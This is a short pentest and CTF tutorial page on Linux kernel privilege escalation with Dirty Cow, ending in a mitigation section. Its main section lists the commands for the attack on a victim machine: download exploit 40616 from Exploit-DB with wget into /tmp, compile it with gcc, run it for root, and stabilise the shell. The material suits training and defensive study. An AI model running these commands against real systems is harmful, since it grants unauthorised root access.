Kernel Exploits
Dirty Cow!
Enumeration
Enumerate kernel version and google it:
uname -a
Or, transfer linux-exploit-suggester.sh
to the victim machine and run it. If the keyword "dirtycow" is in the output, try it.
Dirty Cow
Dirty Cow is the most commonly used kernel exploit in CTF-like. The downside is that a failed Dirty Cow attack may crash the victim machine. This will be really bad in a real-world pentest scenario.
Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the /tmp
directory:
cd /tmp
download it:
wget https://www.exploit-db.com/download/40616 -O cowroot.c
Following the instruction, uncomment a payload, and compile it:
gcc cowroot.c -o cowroot -pthread
Execute the exploit:
./cowroot
Make the shell more stable:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
Cheat Code: Ubuntu 16.04 Privesc
This kernel exploit works smoothly for many boxes:
Mitigation
A successful privilege escalation through kernel exploits require the following 5 conditions:
A vulnerable kernel
A working exploit
A way to transfer the exploit to the target
A way to compile the exploit (optional since some exploits can be compiled on the attack machine)
A way to execute the exploit
Condition 1 and 2 are hard to prevent, hence we should focus on condition 3, 4, and 5. The mitigation ideas are:
Prevent transferring the exploit
Do not allow users to use FTP, TFTP, SMB, SCP, wget, and curl
Remove compilation tools
Remove GCC, CC, and other development tools.
Prevent exploit execution
Mount directories such as
/tmp
and/home
on a separete non-executable file system.For existing executables, set
chmod 700 <executable>
if you don't want the user to execute it.
Last updated
Was this helpful?